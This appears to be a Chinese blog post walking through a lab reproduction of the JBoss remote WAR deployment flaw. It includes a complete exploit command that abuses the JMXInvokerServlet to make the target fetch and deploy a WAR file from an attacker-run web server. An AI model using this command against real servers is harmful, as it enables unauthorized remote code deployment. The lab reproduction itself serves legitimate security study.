复现JBOSS远程部署war包方法二(过程,步骤,说明)

最新推荐文章于 2023-07-24 14:47:55 发布
最新推荐文章于 2023-07-24 14:47:55 发布
阅读量580 收藏 1
点赞数 1
分类专栏: 网络安全漏洞复现 文章标签: 中间件 jboss windows server 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xz_______/article/details/111499420
版权

首先打开靶机中的jboss
在这里插入图片描述
然后依次进入C:\jboss-4.2.3.GA\server\default\deploy\jboss-web.deployer将其中的server.xml配置文件中的访问IP地址改为任意IP地址(然后重启一下我们的jboss,这里我们的靶机就配置好了)
在这里插入图片描述
然后我们使用攻击主机,首先打开我们主机的phpstudy,将apache服务打开
在这里插入图片描述
将war包传入到我们的www目录下
再将我们设置好的exp下载下来

直接window+R打开运行,输入cmd进入命令行界面
在这里插入图片描述
输入:
java -jar jboss_exploit_fat.jar -i http://192.168.0.200:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.0.1/test3693.war
在这里插入图片描述
然后进入jboss查看一下:
在这里插入图片描述

不爱学习的安全小白
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jboss7本地远程部署步骤
08-18
jboss7本地远程部署步骤;详细步骤在里面
jboss部署必须jar
12-11
【标题】"jboss部署必须jar" 指的是在JBoss应用服务器上进行热部署所需的关键Java档案(jar)。热部署允许开发者在不关闭或重启服务器的情况下更新应用,大大提高了开发效率和调试速度。对于JBoss而言,这个特定...
JBOSS安装
jdk2008
02-22 164
声名:转载收藏 1、 安装 1.1、软件安装 首先要安装JDK(仅仅安装JRE是不行的,因为JSP页面需要编译),最新的正式版是JDK1.4.2。然后把JBoss的压缩解压到一个目录下,目录名一般是"Jboss_版本号",JBoss目前的最新正式版是JBoss4.0.0(2004年9月20日发布)。下面的配置都是针对JBoss3.2.5。 1.2、环境变量的设置 需要的环境变量有J...
jboss安装并部署war
最新发布
busijinqudeshen的博客
07-24 1452
进入jboss下standalone/configuration下打开standalone.xml文件,找到如下两个ip修改为0.0.0.0。正常进入部署系统首页,如需要去掉访问名参考Q&A。原文链接:https://blog.csdn.net/qq_35349982/article/details/127091523。2.访问:http://127.0.0.1:9990,输入刚才创建的用户/密码即可进入后台管理页面。2.启动成功的日志如下,打开浏览器访问 http://localhost:8080/
JBoss安装并部署war
飞奔的屎壳郎
09-28 7803
进入jboss下standalone/configuration下打开standalone.xml文件,找到如下两个ip修改为0.0.0.0。1、在jboss的\standalone\configuration目录下有个standalone.xml文件,里边配置相关的端口等;2. 本文章以jboss-eap-7.2版本为例,jboos版本在Window与Linux下通用。jboos 7版本的目录结构,每个大版本目录结构会有所差异。解压Jboss以后在Jboss的bin目录下找到。
JBOSS各版本远程部署方法
执着之道
10-24 194
为了方便快速调试代码,大家都会使用远程部署,郁闷的是JBOSS各个版本远程部署的方式还不一样。所以在这里记录下JBOSS各个版本远程部署方法,免得太多的JAVA同学花时间研究。 [b]JBOSS5.1的远程部署配置[/b]。在server\default\conf\bootstrap目录下profile.xml文件里,加上需要远程部署的路径,如E:/java/Umpspace/conf...
JBoss远程代码调试配置说明
07-03
JBoss远程代码调试配置说明 在软件开发过程中, Debug 调试是非常重要的一步,对于大型项目尤其如此。远程调试可以让开发者在本地追踪实际代码,从而快速定位问题,提高开发效率。 什么是远程调试? 远程调试是指...
jboss部署jar的bat脚本
01-23
部署jarJBoss通常涉及以下步骤: 1. **停止JBOSS服务**:在部署新应用前,我们通常会先停止现有的JBOSS服务,以防止数据丢失和资源冲突。在bat脚本中,可以使用`jboss-cli.bat`工具(位于JBOSS_HOME/bin目录下...
jboss项目在linux环境下部署步骤借鉴.pdf
12-10
在Linux环境下部署JBoss项目需要遵循一系列步骤,主要括安装JDK和JBoss、配置环境变量、启动JBoss服务器以及部署应用程序。以下是对这些步骤的详细解释: 1. **确定Linux系统位数并安装JDK和JBoss** - 在Linux...
Tomcat 或 Jboss 部署WAR
热门推荐
oyzl68的专栏
11-03 2万+
从Tomcat 7开始,WEB-INF目录下面不再生成web.xml!也不再需要它,所以不需要像网上别的文章说的那样手动建立web.xml文件!! 确定一点:Tomcat根目录为webapps 事实上,只需要使用Eclipse的Export功能导出项目为WAR文件,然后把WAR文件拷贝到Tomcat的webapps  (X:\ {apache-tomcat-目录} \webapps\ )下
jboss-system.jar
11-27
jboss-system.jar jboss-system.jar
Eclipse工程Http Invoker Service & Client
11-23
Eclipse工程Http Invoker Service & Client
jboss相关Jar
07-17
jboss-jmx.jar jboss-cache.jar jboss-common.jar jboss-system.jar 网上都是分散的,我把他们合起来一起上传了,方便大家下载!
Jboss远程命令执行部署war以及如何开启口令防御。
qfslyy的博客
12-21 388
接上一个文章,另一种部署war方式:远程命令执行部署war,以及如何开启口令,提高安全。 远程命令执行部署war: 待定 1:jbos exp 防御,主要改三个地方 1:定义用户密码的: 2:改这个文件 取消注释 3: 最下面取消security的注释。: 重启服务之后,再次访问便需要口令了: ...
一台JBoss服务器同时部署多个项目war
张姐姐聊编程
05-31 6955
在公司做的项目是使用Jboss-eap服务器进行部署后端项目所打出来的war,在没有研究这个技术点之前,是一台服务器部署一个项目的war.所以如果是多个项目的话,那么就需要申请多台服务器,非常的浪费资源,所以就要想办法解决啦。原来一直听说过一台jboss服务器可以部署多个war,但是没有尝试过,这次就必须要去做啦。一起来了解一下最后的实现结果吧。
复现JBOSS远程部署war过程步骤说明
XZ_______的博客
12-21 1662
实验环境: 一台配置好jboss环境的windows server 2003靶机 一台装有phpstudy的攻击主机 实验说明: 两台主机可以互相ping通 实验步骤: 首先打开靶机中的jboss 然后依次进入C:\jboss-4.2.3.GA\server\default\deploy\jboss-web.deployer将其中的server.xml配置文件中的访问IP地址改为任意IP地址(然后重启一下我们的jboss,这里我们的靶机就配置好了) 然后我们使用攻击主机,首先打开我们主机的phpstud
JBOSS远程部署war漏洞复现
小小猪的博客
11-22 881
JBOSS远程部署war漏洞复现 框架介绍: 是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用 漏洞复现: 第一种: 访问页面之后,点击。 进入到控制页面后我们点击 找到我们的add URL 将我们的www目录下的...
JBoss5.1.0部署项目
csdn122325735的专栏
10-20 733
JBoss5.1.0部署项目
通向架构师的道路(第十五天)SSH的单元测试与dbunit的整合
iteye_6378的博客
12-03 283
一、前言 在十三天中我们介绍了使用maven来下载工程的依赖库文件,用ant来进行war的建立。今天我们在这个基础上将使用junit+dbunit来进行带有单元测试报告的框架的架构。 目标: 每次打之前自动进行单元测试并生成单元测试报告 生成要布署的打文件即war 单元测试的代码不能够被打在正式的要布署的war内,单元测试仅用于unit test用 使用模拟数据对dao层进...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不爱学习的安全小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值